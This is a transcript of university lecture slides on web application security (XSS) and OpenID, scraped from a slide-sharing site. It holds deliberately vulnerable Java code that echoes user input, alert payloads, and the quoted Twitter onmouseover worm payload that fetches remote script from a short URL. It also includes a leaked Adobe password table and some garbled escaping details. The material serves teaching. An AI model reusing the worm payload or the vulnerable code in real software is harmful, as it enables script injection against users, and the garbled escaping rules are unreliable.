Presentation is loading. Please wait.

Presentation is loading. Please wait.

Web Application Security + OpenID NWEN 304: Advanced Network Applications.

Published byJohnathan Hood Modified over 8 years ago

Similar presentations

Presentation on theme: "Web Application Security + OpenID NWEN 304: Advanced Network Applications."— Presentation transcript:

1 Web Application Security + OpenID NWEN 304: Advanced Network Applications

2 Info ICT Careers fair on Friday Tech report out today Teaching evaluations Groups

3 Cross-site scripting (XSS) An input validation vulnerability. Allows an attacker to inject client-side code (JavaScript) into web pages. This is then served by a vulnerable web application to other users.

4 Reflected XSS The injected code is reflected off the web server – an error message, – search result, – response includes some/all of the input sent to the server as part of the request Only the user issuing the malicious request is affected StringsearchQuery= request.getParameter(“sear c hQuery”); … PrintWriterout= response.getWriter(); out.println(" "+ "Resultsfor " + searchQuery + " )"; User request: searchQuery= alert("pwnd")

5 Stored XSS The injected code is stored on the web site and served to its visitors on all page views – user messages, – user profiles, All users affected StringpostMsg = db.getPostMsg(0); … PrintWriterout= response.getWriter(); out.println(" "+ postMsg)"; pstMsg: searchQuery= alert("pwnd")

6 Solution for injection: santization Santizing all user inputs is difficult -- why? Sanitization is context-dependent – JavaScript user input – CSS value a:hover {color: user input } – URL value Sanitization is attack-dependent, e.g. – JavaScript – SQL Blacklisting vs. whitelisting Roll-your-own vs. reuse

7 Roll-your-own: example On Twitter if user posts www.site.com, twitter displays: www.site.com Twitter’s old sanitization algorithm blocked but allowed “. What happens if somebody tweets: http://t.co/ @"onmouseover="$.getScript('http:\u002f \u002fis.gd\u002ffl9A7')”/ Twitter displays: … http://www.htmlgoodies.com/beyond/javascript/article.php/3 470771

8 Roll-your-own: example Anyone putting mouse over such a twitter feed will run JavaScript that puts a similar mesage in their own feed. The actual attack used: http://t.co/@"style="font-size:999999999999px; "onmouseover=”…/ – Why the style part?

9 Roll-your-own: example This is what it looked like:

10 Reuse: example JQuery has built-in support.text() method for strings and.val() for input parameters. Escapes html code and prevents the browser interpreting a given string. -& becomes &amp -< becomes @lt -> becomes @gt http://api.jquery.com/text/

11 Now: OpenID Terminology: Identity Authentication Authorisation OpenID

12 Identity A set of attributes related to an entity Entity: Attributes: Name Address Sex Height Etc. Identity: Work, Personal, Private

13 Identity

14 Authentication Positive verification of identity Determines: What you know – pin/password What you have – token/cert/RFID Who you are – Biometric

15 Authorisation Authorisation determines whether an entity is allowed to perform a given activity Typically inherits from authentication Cases like OAuth let you access protected data (across domains) without having to re- authenticate the user

16 OpenID, OAuth, and OpenID Connect OpenID = Authentication Making sure the user is who they say they are OAuth = Authorisation Deciding what the user is allowed to do An “access granting protocol” More on this next time OpenID Connect = Authentication (but built on OAuth 2.0)

17 Password Management: Adobe # Count Ciphertext Plaintext ----------------------------------------------------------------------------------------- 1. 1911938 EQ7fIpT7i/Q= 123456 2. 446162 j9p+HwtWWT86aMjgZFLzYg== 123456789 3. 345834 L8qbAD3jl3jioxG6CatHBw== password 4. 211659 BB4e6X+b2xLioxG6CatHBw== adobe123 5. 201580 j9p+HwtWWT/ioxG6CatHBw== 12345678 6. 130832 5djv7ZCI2ws= qwerty 7. 124253 dQi0asWPYvQ= 1234567 8. 113884 7LqYzKVeq8I= 111111 9. 83411 PMDTbP0LZxu03SwrFUvYGA== photoshop 10. 82694 e6MPXQ5G6a8= 123123

18 OpenID 1.0/2.0 Started around 2005 Motivation: Users have accounts all over the Web User profiles are distinct Multiple passwords problem Goal: Apps/sites can leverage an OpenID provider: A third party authentication service Federated login Users have one account at the provider

19 OpenID 1.0/2.0 Decentralised mechanism for authentication OpenID protocol: describes authentication process OpenID: - It *is* a URI - http://ryan.myopenid.com/http://ryan.myopenid.com/ - The user is in control and selects the URI - Pick a provider you trust, similar to email - Your own domain (delegate process to another IP) - Have multiple identities OpenID Providers Google, Yahoo!, etc. Yourself – run your own server

20 OpenID 1.0/2.0 You can claim you own the URI You can prove you own the URI  You can use it to authenticate yourself on other websites  You don’t need to have an account on a new website It can also be extended to include profile information and claims

21 How it works XSRD (eXtensible Resource Descriptor Sequence): Format for discovery response Describes endpoint to send login requests Credit: https://edux.fit.cvut.cz/oppa/MI-W20/prednasky/w20-9.pdf

22 How it works The user authenticates with the openid provider: Example Google OpenID provider https://www.google.com/accounts/o8/id ?openid.ns=http://specs.openid.net/auth/2.0 &openid.return_to=https://www.example.com/checkauth &openid.realm=http://www.example.com/ &openid.assoc_handle=ABSmpf6DNMw &openid.mode=checkid_setup ns – protocol version (obtained from the XRDS) mode – type of message or additional semantics return_to – callback page the provider sends the result realm – domain the user will trust, consistent with return_to assoc_handle – "log in" for web app with openid provider Credit: https://edux.fit.cvut.cz/oppa/MI-W20/prednasky/w20-9.pdf

23 OpenID 1.0/2.0 Limitations Never really adopted Works for websites, but not native apps/mobile Difficult to implement (properly) URI’s are hard for many users to understand and remember Relies on XML

24 OpenID Connect Third iteration of OpenID Released 2014 An identity layer on top of OAuth2.0 Much more developer friendly Leverages standard TLS infrastructure + JSON+ REST= better interoperability and adoption Designed for mobile/apps etc. Scalable security: LaO1-04 Based on emails

25 OpenID Connect

26 Next time OAuth and you.

Download ppt "Web Application Security + OpenID NWEN 304: Advanced Network Applications."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
FI-WARE Testbed Access Control temporary solution.

FI-WARE Testbed Access Control temporary solution.
Building web applications on top of encrypted data using Mylar Presented by Tenglu Liang Tai Liu.

Building web applications on top of encrypted data using Mylar Presented by Tenglu Liang Tai Liu.
Environmental Council of States Network Authentication and Authorization Services The Shared Security Component February 28, 2005.

Environmental Council of States Network Authentication and Authorization Services The Shared Security Component February 28, 2005.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
INF 123 SW ARCH, DIST SYS & INTEROP LECTURE 16 Prof. Crista Lopes.

INF 123 SW ARCH, DIST SYS & INTEROP LECTURE 16 Prof. Crista Lopes.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Martin Kruliš 2. 4. 2015 by Martin Kruliš (v1.0)1.

Martin Kruliš by Martin Kruliš (v1.0)1.
CHC DI Group. What We Will Cover Securing your devices and computers. Passwords. Emails. Safe browsing for shopping and online banks. Social media.

CHC DI Group. What We Will Cover Securing your devices and computers. Passwords. s. Safe browsing for shopping and online banks. Social media.
JavaScript & jQuery the missing manual Chapter 11

JavaScript & jQuery the missing manual Chapter 11
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
Prevent Cross-Site Scripting (XSS) attack

Prevent Cross-Site Scripting (XSS) attack
Introduction to SQL Server 2000 Security Dave Watts CTO, Fig Leaf Software

Introduction to SQL Server 2000 Security Dave Watts CTO, Fig Leaf Software
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Similar presentations

Ads by Google